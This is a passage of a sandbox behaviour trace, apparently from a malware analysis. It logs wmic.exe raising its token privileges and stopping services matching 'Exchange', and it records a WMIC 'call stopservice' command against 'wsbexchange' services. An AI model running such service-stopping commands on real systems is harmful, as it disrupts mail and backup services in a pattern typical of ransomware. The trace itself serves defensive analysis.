(_Block=0x7d2788) [0310.137] lstrlenW (lpString="") returned 0 [0310.137] lstrlenW (lpString="NQDPDE") returned 6 [0310.138] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0310.138] lstrlenW (lpString="NQDPDE") returned 6 [0310.138] malloc (_Size=0xe) returned 0x7dae40 [0310.138] lstrlenW (lpString="NQDPDE") returned 6 [0310.138] GetCurrentThreadId () returned 0x11b8 [0310.138] GetCurrentProcess () returned 0xffffffff [0310.138] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x11f71c | out: TokenHandle=0x11f71c*=0x2f8) returned 1 [0310.138] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x11f718 | out: TokenInformation=0x0, ReturnLength=0x11f718) returned 0 [0310.138] malloc (_Size=0x118) returned 0x7db9b8 [0310.138] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x7db9b8, TokenInformationLength=0x118, ReturnLength=0x11f718 | out: TokenInformation=0x7db9b8, ReturnLength=0x11f718) returned 1 [0310.138] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x7db9b8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0310.138] free (_Block=0x7db9b8) [0310.138] CloseHandle (hObject=0x2f8) returned 1 [0310.138] lstrlenW (lpString="GET") returned 3 [0310.138] lstrlenW (lpString="call") returned 4 [0310.138] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0310.138] lstrlenW (lpString="LIST") returned 4 [0310.138] lstrlenW (lpString="call") returned 4 [0310.138] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0310.138] lstrlenW (lpString="SET") returned 3 [0310.138] lstrlenW (lpString="call") returned 4 [0310.138] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0310.138] lstrlenW (lpString="CALL") returned 4 [0310.138] lstrlenW (lpString="call") returned 4 [0310.138] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0310.139] ??0CHString@@QAE@XZ () returned 0x11f6dc [0310.139] GetCurrentThreadId () returned 0x11b8 [0310.139] malloc (_Size=0xc) returned 0x7dae88 [0310.139] malloc (_Size=0xc) returned 0x7dae10 [0310.139] malloc (_Size=0xc) returned 0x7dae58 [0310.139] malloc (_Size=0xc) returned 0x7dae70 [0310.139] malloc (_Size=0xc) returned 0x7d9940 [0310.139] SysStringLen (param_1="\\\\") returned 0x2 [0310.139] SysStringLen (param_1="NQDPDE") returned 0x6 [0310.139] malloc (_Size=0xc) returned 0x7dbdd8 [0310.139] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0310.139] SysStringLen (param_1="\\") returned 0x1 [0310.139] malloc (_Size=0xc) returned 0x7dbec8 [0310.139] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0310.139] SysStringLen (param_1="root\\cimv2") returned 0xa [0310.140] free (_Block=0x7dbdd8) [0310.140] free (_Block=0x7d9940) [0310.140] free (_Block=0x7dae70) [0310.140] free (_Block=0x7dae58) [0310.140] free (_Block=0x7dae10) [0310.140] free (_Block=0x7dae88) [0310.140] malloc (_Size=0xc) returned 0x7dbd48 [0310.140] malloc (_Size=0xc) returned 0x7dbdc0 [0310.140] malloc (_Size=0xc) returned 0x7dbd78 [0310.140] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5648f0, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x5c12e8) returned 0x0 [0310.148] free (_Block=0x7dbd78) [0310.148] free (_Block=0x7dbdc0) [0310.148] free (_Block=0x7dbd48) [0310.149] CoSetProxyBlanket (pProxy=0x5c12e8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0310.149] free (_Block=0x7dbec8) [0310.149] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0310.149] ??0CHString@@QAE@XZ () returned 0x11f6d4 [0310.149] GetCurrentThreadId () returned 0x11b8 [0310.149] malloc (_Size=0x38) returned 0x7db9b8 [0310.149] malloc (_Size=0x28) returned 0x7db9f8 [0310.149] malloc (_Size=0x28) returned 0x7dba28 [0310.149] malloc (_Size=0x38) returned 0x7dba58 [0310.149] malloc (_Size=0x38) returned 0x7dba98 [0310.149] malloc (_Size=0x24) returned 0x7dbad8 [0310.149] malloc (_Size=0xc) returned 0x7dae70 [0310.149] lstrlenA (lpString="") returned 0 [0310.149] malloc (_Size=0x2) returned 0x7d2788 [0310.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x7d2788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0310.149] free (_Block=0x7d2788) [0310.149] malloc (_Size=0x38) returned 0x7dbb08 [0310.149] malloc (_Size=0x24) returned 0x7dbb48 [0310.149] malloc (_Size=0xc) returned 0x7dae10 [0310.150] free (_Block=0x7dae70) [0310.150] IWbemServices:GetObject (in: This=0x5c12e8, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x11f6ac*=0x0, ppCallResult=0x0 | out: ppObject=0x11f6ac*=0x5c0a80, ppCallResult=0x0) returned 0x0 [0310.207] malloc (_Size=0xc) returned 0x7dae70 [0310.208] IWbemClassObject:GetMethod (in: This=0x5c0a80, wszName="stopservice", lFlags=0, ppInSignature=0x11f6c8, ppOutSignature=0x11f6a8 | out: ppInSignature=0x11f6c8*=0x0, ppOutSignature=0x11f6a8*=0x5c0c78) returned 0x0 [0310.208] free (_Block=0x7dae70) [0310.208] IUnknown:Release (This=0x5c0c78) returned 0x0 [0310.208] IUnknown:Release (This=0x5c0a80) returned 0x0 [0310.208] ??0CHString@@QAE@XZ () returned 0x11f58c [0310.208] GetCurrentThreadId () returned 0x11b8 [0310.208] malloc (_Size=0xc) returned 0x7dae58 [0310.208] lstrlenA (lpString="") returned 0 [0310.208] malloc (_Size=0x2) returned 0x7d2788 [0310.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x7d2788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0310.208] free (_Block=0x7d2788) [0310.208] malloc (_Size=0xc) returned 0x7dae70 [0310.208] lstrlenA (lpString="") returned 0 [0310.208] malloc (_Size=0x2) returned 0x7d2788 [0310.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x7d2788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0310.208] free (_Block=0x7d2788) [0310.209] malloc (_Size=0xc) returned 0x7dae88 [0310.209] free (_Block=0x7dae70) [0310.209] malloc (_Size=0xc) returned 0x7dae70 [0310.209] lstrlenA (lpString="SELECT * FROM ") returned 14 [0310.209] malloc (_Size=0x1e) returned 0x7dbb78 [0310.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x7dbb78, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0310.209] free (_Block=0x7dbb78) [0310.209] malloc (_Size=0xc) returned 0x7d9940 [0310.209] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0310.209] SysStringLen (param_1="Win32_Service") returned 0xd [0310.209] free (_Block=0x7dae70) [0310.209] malloc (_Size=0xc) returned 0x7dae70 [0310.209] malloc (_Size=0xc) returned 0x7dbee0 [0310.209] lstrlenA (lpString=" WHERE ") returned 7 [0310.209] malloc (_Size=0x10) returned 0x7dbe80 [0310.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x7dbe80, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0310.210] free (_Block=0x7dbe80) [0310.210] malloc (_Size=0xc) returned 0x7dbf10 [0310.210] SysStringLen (param_1=" WHERE ") returned 0x7 [0310.210] SysStringLen (param_1="name like '%%Exchange%%'") returned 0x18 [0310.210] malloc (_Size=0xc) returned 0x7dbef8 [0310.210] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0310.210] SysStringLen (param_1=" WHERE name like '%%Exchange%%'") returned 0x1f [0310.210] free (_Block=0x7d9940) [0310.210] free (_Block=0x7dbf10) [0310.210] free (_Block=0x7dbee0) [0310.210] free (_Block=0x7dae70) [0310.210] malloc (_Size=0xc) returned 0x7dbd48 [0310.210] IWbemServices:ExecQuery (in: This=0x5c12e8, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%Exchange%%'", lFlags=48, pCtx=0x0, ppEnum=0x11f598 | out: ppEnum=0x11f598*=0x5c4868) returned 0x0 [0310.223] free (_Block=0x7dbd48) [0310.223] CoSetProxyBlanket (pProxy=0x5c4868, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0310.229] IEnumWbemClassObject:Next (in: This=0x5c4868, lTimeout=-1, uCount=0x1, apObjects=0x11f594, puReturned=0x11f584 | out: apObjects=0x11f594*=0x5988f0, puReturned=0x11f584*=0x1) returned 0x0 [0311.102] IWbemClassObject:Get (in: This=0x5988f0, wszName="__PATH", lFlags=0, pVal=0x11f560*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x11f560*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\NQDPDE\\root\\cimv2:Win32_Service.Name=\"vmickvpexchange\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0311.102] malloc (_Size=0xc) returned 0x7dbce8 [0311.102] ??0CHString@@QAE@XZ () returned 0x11f510 [0311.102] GetCurrentThreadId () returned 0x11b8 [0311.102] LoadStringW (in: hInstance=0x0, uID=0xb7ea, lpBuffer=0x11e4c4, cchBufferMax=1024 | out: lpBuffer="Executing (%1)->%2()\r\n") returned 0x16 [0311.102] FormatMessageW (in: dwFlags=0x2500, lpSource=0x11e4c4, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x11e4ac, nSize=0x0, Arguments=0x11e4b0 | out: lpBuffer="誈Y畜Y⬀}InterfExecuting (%1)->%2()\r\n") returned 0x55 [0311.103] malloc (_Size=0xc) returned 0x7dbe08 [0311.103] LocalFree (hMem=0x598a88) returned 0x0 [0311.103] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Executing (\\\\NQDPDE\\root\\cimv2:Win32_Service.Name=\"vmickvpexchange\")->stopservice()\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 86 [0311.103] malloc (_Size=0x56) returned 0x7dbb78 [0311.103] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Executing (\\\\NQDPDE\\root\\cimv2:Win32_Service.Name=\"vmickvpexchange\")->stopservice()\r\n", cchWideChar=-1, lpMultiByteStr=0x7dbb78, cbMultiByte=86, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Executing (\\\\NQDPDE\\root\\cimv2:Win32_Service.Name=\"vmickvpexchange\")->stopservice()\r\n", lpUsedDefaultChar=0x0) returned 86 [0311.103] ??YCHString@@QAEABV0@PBG@Z () returned 0xa685ec [0311.103] __iob_func () returned 0x776f2608 [0311.103] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 85 [0311.103] __iob_func () returned 0x776f2608 [0311.103] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0311.103] free (_Block=0x7dbb78) [0311.103] free (_Block=0x7dbe08) [0311.103] malloc (_Size=0xc) returned 0x7dbe98 [0311.104] IWbemServices:ExecMethod (in: This=0x5c12e8, strObjectPath="\\\\NQDPDE\\root\\cimv2:Win32_Service.Name=\"vmickvpexchange\"", strMethodName="stopservice", lFlags=0, pCtx=0x0, pInParams=0x0, ppOutParams=0x11f520*=0x0, ppCallResult=0x0 | out: ppOutParams=0x11f520*=0x5999d0, ppCallResult=0x0) returned 0x0 [0311.418] free (_Block=0x7dbe98) [0311.418] malloc (_Size=0x800) returned 0x7dd188 [0311.419] LoadStringW (in: hInstance=0x0, uID=0xb3b3, lpBuffer=0x7dd188, cchBufferMax=1024 | out: lpBuffer="Method execution successful.\r\n") returned 0x1e [0311.419] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Method execution successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0311.419] malloc (_Size=0x1f) returned 0x7dbb78 [0311.419] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Method execution successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x7dbb78, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Method execution successful.\r\n", lpUsedDefaultChar=0x0) returned 31 [0311.419] ??YCHString@@QAEABV0@PBG@Z () returned 0xa685ec [0311.419] __iob_func () returned 0x776f2608 [0311.419] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 30 [0311.419] __iob_func () returned 0x776f2608 [0311.419] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0311.419] free (_Block=0x7dbb78) [0311.419] free (_Block=0x7dd188) [0311.419] IUnknown:AddRef (This=0x5999d0) returned 0x2 [0311.419] ??0CHString@@QAE@XZ () returned 0x11ecb8 [0311.419] GetCurrentThreadId () returned 0x11b8 [0311.419] IWbemClassObject:GetObjectText (in: This=0x5999d0, lFlags=0, pstrObjectText=0x11ecc0 | out: pstrObjectText=0x11ecc0*="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 5;\n};\n") returned 0x0 [0311.419] malloc (_Size=0x800) returned 0x7dd188 [0311.419] LoadStringW (in: hInstance=0x0, uID=0xb7f7, lpBuffer=0x7dd188, cchBufferMax=1024 | out: lpBuffer="Out Parameters:") returned 0xf [0311.419] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Out Parameters:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0311.419] malloc (_Size=0x10) returned 0x7dbd78 [0311.419] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Out Parameters:", cchWideChar=-1, lpMultiByteStr=0x7dbd78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Out Parameters:", lpUsedDefaultChar=0x0) returned 16 [0311.419] ??YCHString@@QAEABV0@PBG@Z () returned 0xa685ec [0311.419] __iob_func () returned 0x776f2608 [0311.420] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 15 [0311.420] __iob_func () returned 0x776f2608 [0311.420] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0311.420] free (_Block=0x7dbd78) [0311.420] free (_Block=0x7dd188) [0311.420] malloc (_Size=0xc) returned 0x7dbd30 [0311.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 5;\n};\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0311.420] malloc (_Size=0x32) returned 0x7dbb78 [0311.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 5;\n};\n", cchWideChar=-1, lpMultiByteStr=0x7dbb78, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 5;\n};\n", lpUsedDefaultChar=0x0) returned 50 [0311.420] ??YCHString@@QAEABV0@PBG@Z () returned 0xa685ec [0311.420] __iob_func () returned 0x776f2608 [0311.420] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 49 [0311.420] __iob_func () returned 0x776f2608 [0311.420] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0311.420] free (_Block=0x7dbb78) [0311.420] free (_Block=0x7dbd30) [0311.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0311.420] malloc (_Size=0x2) returned 0x7d2788 [0311.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=-1, lpMultiByteStr=0x7d2788, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 2 [0311.420] ??YCHString@@QAEABV0@PBG@Z () returned 0xa685ec [0311.420] __iob_func () returned 0x776f2608 [0311.420] fprintf (in: _File=0x776f2648, _Format="%s" | out: _File=0x776f2648) returned 1 [0311.420] __iob_func () returned 0x776f2608 [0311.420] fflush (in: _File=0x776f2648 | out: _File=0x776f2648) returned 0 [0311.421] free (_Block=0x7d2788) [0311.421] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0311.421] IUnknown:Release (This=0x5999d0) returned 0x1 [0311.421] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0311.421] free (_Block=0x7dbce8) [0311.421] IUnknown:Release (This=0x5988f0) returned 0x0 [0311.422] IEnumWbemClassObject:Next (in: This=0x5c4868, lTimeout=-1, uCount=0x1, apObjects=0x11f594, puReturned=0x11f584 | out: apObjects=0x11f594*=0x0, puReturned=0x11f584*=0x0) returned 0x1 [0311.423] IUnknown:Release (This=0x5c4868) returned 0x0 [0311.425] free (_Block=0x7dbef8) [0311.425] free (_Block=0x7dae88) [0311.425] free (_Block=0x7dae58) [0311.425] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0311.425] free (_Block=0x7dae10) [0311.425] free (_Block=0x7dbad8) [0311.425] free (_Block=0x7dba98) [0311.425] free (_Block=0x7dba58) [0311.425] free (_Block=0x7dba28) [0311.425] free (_Block=0x7db9f8) [0311.425] free (_Block=0x7dbb48) [0311.425] free (_Block=0x7dbb08) [0311.425] free (_Block=0x7db9b8) [0311.425] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0311.425] GetCurrentThreadId () returned 0x11b8 [0311.425] ??0CHString@@QAE@PBG@Z () returned 0x11f74c [0311.425] ??YCHString@@QAEABV0@PBG@Z () returned 0x11f74c [0311.425] lstrlenW (lpString="LIST") returned 4 [0311.425] lstrlenW (lpString="call") returned 4 [0311.425] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0311.425] lstrlenW (lpString="ASSOC") returned 5 [0311.425] lstrlenW (lpString="call") returned 4 [0311.425] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0311.425] lstrlenW (lpString="GET") returned 3 [0311.425] lstrlenW (lpString="call") returned 4 [0311.425] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0311.425] ??1CHString@@QAE@XZ () returned 0x1 [0311.426] WbemLocator:IUnknown:Release (This=0x5c12e8) returned 0x0 [0311.426] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0311.426] _kbhit () returned 0x0 [0311.431] free (_Block=0x7d2ee8) [0311.431] free (_Block=0x7dab58) [0311.431] free (_Block=0x7dacd8) [0311.431] free (_Block=0x7dad20) [0311.431] free (_Block=0x7dab40) [0311.431] free (_Block=0x7db058) [0311.431] free (_Block=0x7db188) [0311.431] free (_Block=0x7d9da8) [0311.431] free (_Block=0x7db208) [0311.431] free (_Block=0x7dab70) [0311.431] free (_Block=0x7d2b00) [0311.431] free (_Block=0x7d0520) [0311.431] free (_Block=0x7dbc88) [0311.432] free (_Block=0x7dac90) [0311.432] free (_Block=0x7daed0) [0311.432] free (_Block=0x7dbc48) [0311.432] free (_Block=0x7dbc08) [0311.432] free (_Block=0x7dae28) [0311.432] free (_Block=0x7daea0) [0311.432] free (_Block=0x7daeb8) [0311.432] free (_Block=0x7dbbd8) [0311.432] IUnknown:Release (This=0x5999d0) returned 0x0 [0311.432] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0311.432] free (_Block=0x7db0f0) [0311.433] free (_Block=0x7dabe8) [0311.433] free (_Block=0x7d0568) [0311.433] free (_Block=0x7dabd0) [0311.433] free (_Block=0x7db1c8) [0311.433] free (_Block=0x7dac18) [0311.433] free (_Block=0x7d2ce0) [0311.433] free (_Block=0x7d26b0) [0311.433] free (_Block=0x7d26f8) [0311.433] free (_Block=0x7d2740) [0311.433] free (_Block=0x7dae40) [0311.433] free (_Block=0x7d27c8) [0311.433] free (_Block=0x7d0508) [0311.433] free (_Block=0x7d29a0) [0311.433] free (_Block=0x7d04f0) [0311.433] free (_Block=0x7d29e0) [0311.433] free (_Block=0x7d04d8) [0311.433] free (_Block=0x7d29c0) [0311.433] free (_Block=0x7d2908) [0311.433] free (_Block=0x7d2920) [0311.433] free (_Block=0x7d28d0) [0311.433] free (_Block=0x7d28e8) [0311.433] free (_Block=0x7d2940) [0311.433] free (_Block=0x7d2958) [0311.433] free (_Block=0x7d04a0) [0311.433] free (_Block=0x7d04b8) [0311.433] free (_Block=0x7d2860) [0311.433] free (_Block=0x7d2878) [0311.434] free (_Block=0x7d2828) [0311.434] free (_Block=0x7d2840) [0311.434] free (_Block=0x7d2898) [0311.434] free (_Block=0x7d28b0) [0311.434] free (_Block=0x7d27f0) [0311.434] free (_Block=0x7d2808) [0311.434] free (_Block=0x7d27a0) [0311.434] free (_Block=0x7d1200) [0311.434] free (_Block=0x7dafd0) [0311.434] WbemLocator:IUnknown:Release (This=0x5648f0) returned 0x2 [0311.434] WbemLocator:IUnknown:Release (This=0x56ae60) returned 0x0 [0311.435] WbemLocator:IUnknown:Release (This=0x5648f0) returned 0x1 [0311.435] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0311.435] WbemLocator:IUnknown:Release (This=0x5648f0) returned 0x0 [0311.435] free (_Block=0x7dac00) [0311.435] free (_Block=0x7dac48) [0311.435] free (_Block=0x7d2a60) [0311.435] free (_Block=0x7dadf8) [0311.435] free (_Block=0x7dab10) [0311.435] free (_Block=0x7d2be0) [0311.435] free (_Block=0x7daca8) [0311.435] free (_Block=0x7dad38) [0311.435] free (_Block=0x7d2ac0) [0311.435] free (_Block=0x7dad80) [0311.435] free (_Block=0x7dadb0) [0311.435] free (_Block=0x7d2b80) [0311.435] free (_Block=0x7dab28) [0311.435] free (_Block=0x7dacf0) [0311.435] free (_Block=0x7d2ca0) [0311.435] free (_Block=0x7dacc0) [0311.435] free (_Block=0x7dab88) [0311.436] free (_Block=0x7d2d60) [0311.436] free (_Block=0x7dad08) [0311.436] free (_Block=0x7dac78) [0311.436] free (_Block=0x7d2a40) [0311.436] free (_Block=0x7dadc8) [0311.436] free (_Block=0x7dad50) [0311.436] free (_Block=0x7d2b60) [0311.436] free (_Block=0x7d98f8) [0311.436] free (_Block=0x7dac30) [0311.436] free (_Block=0x7d2d40) [0311.436] free (_Block=0x7dade0) [0311.436] free (_Block=0x7dad68) [0311.436] free (_Block=0x7d2ba0) [0311.436] free (_Block=0x7daba0) [0311.436] free (_Block=0x7dac60) [0311.436] free (_Block=0x7d2c20) [0311.436] free (_Block=0x7dabb8) [0311.436] free (_Block=0x7dad98) [0311.436] free (_Block=0x7d2a20) [0311.436] free (_Block=0x7d9928) [0311.436] free (_Block=0x7d9820) [0311.436] free (_Block=0x7d2c60) [0311.436] free (_Block=0x7d9958) [0311.436] free (_Block=0x7d9898) [0311.436] free (_Block=0x7d2b40) [0311.437] free (_Block=0x7d9910) [0311.437] free (_Block=0x7d9868) [0311.437] free (_Block=0x7d2bc0) [0311.437] free (_Block=0x7d99a0) [0311.437] free (_Block=0x7d99b8) [0311.437] free (_Block=0x7d2c80) [0311.437] free (_Block=0x7d9838) [0311.437] free (_Block=0x7d9850) [0311.437] free (_Block=0x7d2d00) [0311.437] free (_Block=0x7d9970) [0311.437] free (_Block=0x7d9988) [0311.437] free (_Block=0x7d2d20) [0311.437] free (_Block=0x7d97f0) [0311.437] free (_Block=0x7d9808) [0311.437] free (_Block=0x7d2aa0) [0311.437] free (_Block=0x7d98b0) [0311.437] free (_Block=0x7d98e0) [0311.437] free (_Block=0x7d2ae0) [0311.437] free (_Block=0x7d9880) [0311.437] free (_Block=0x7d98c8) [0311.437] free (_Block=0x7d2a00) [0311.437] CoUninitialize () [0311.496] exit (_Code=0) [0311.496] free (_Block=0x7daee8) [0311.496] free (_Block=0x7d1008) [0311.496] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0311.496] free (_Block=0x7d2e10) [0311.496] free (_Block=0x7d27e0) [0311.496] free (_Block=0x7d0fe8) [0311.496] free (_Block=0x7d0fc8) [0311.496] free (_Block=0x7d0f98) [0311.496] free (_Block=0x7d0f78) [0311.496] free (_Block=0x7d0f48) [0311.496] free (_Block=0x7d0f08) [0311.496] free (_Block=0x7d0ee8) [0311.496] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0311.496] free (_Block=0x7d2c40) Thread: id = 321 os_tid = 0x12e8 Thread: id = 322 os_tid = 0x1178 Thread: id = 323 os_tid = 0x1270 Thread: id = 324 os_tid = 0xb00 Process: id = "32" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x3c7e0000" os_pid = "0xffc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%wsbexchange%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], 